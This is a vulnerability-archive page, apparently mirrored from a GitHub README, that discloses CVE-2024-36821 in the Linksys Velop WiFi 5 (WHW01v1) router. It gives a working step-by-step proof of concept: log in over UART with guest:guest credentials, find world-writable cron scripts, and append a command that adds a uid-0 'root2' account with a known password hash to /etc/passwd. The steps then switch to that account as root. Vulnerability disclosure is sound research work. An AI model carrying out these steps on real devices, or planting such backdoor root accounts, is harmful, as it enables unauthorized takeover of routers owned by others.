POC详情: cd7be423419749491b051ab4af36fb36f626eb07

来源
关联漏洞
标题: Linksys Velop WiFi 安全漏洞 (CVE-2024-36821)
描述:Linksys Velop WiFi是美国Linksys公司的一个路由器。 Linksys Velop WiFi 5 (WHW01v1) 1.1.13.202617版本存在安全漏洞,该漏洞源于允许攻击者通过目录遍历将权限从 Guest 提升到 root。
描述
The public reference that contains the minimum require information for the vulnerability covered by CVE-2024-36821
介绍
# CVE-2024-36821
The public reference that contains the minimum require information for the vulnerability covered by CVE-2024-36821

### The original video with PoC you may find on the video -> https://www.youtube.com/watch?v=6vHno0ik7JY

### The PoC:
1. Connect to the router witnin UART conenction
2. Using `guest:guest` credentials, log into the system
3. Using `find / -perm -777 -type f 2>/dev/null` command, find files with read-write-execute permissions:
    ```
    1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
    2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
    3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
    4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
    5. /tmp/cron/cron.everyminute/conntrack_collector.sh
    ```
    <img width="456" alt="Screenshot 2024-06-10 at 20 00 50" src="https://github.com/IvanGlinkin/CVE-2024-36821/assets/64857726/b464856d-e222-493c-a697-1c3fe4cbbd98">

5. Check the owner by `ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh` command
6. Generate the password by `openssl passwd Abracadabra` command
7. Edit `/tmp/cron/cron.everyminute/conntrack_collector.sh`, adding to the end the new generated password:
   ```
   echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
   ```
   
    <img width="424" alt="Screenshot 2024-06-10 at 20 05 05" src="https://github.com/IvanGlinkin/CVE-2024-36821/assets/64857726/babb8bae-cc11-49e2-9b76-d45fd26c21d1">

9. Wait for a minute
10. Switch user into root2 by the next command
    ```
    / $ su root2
    Password: Abracadabra
    ~ #
    ```
文件快照

[4.0K] /data/pocs/cd7be423419749491b051ab4af36fb36f626eb07 └── [1.5K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。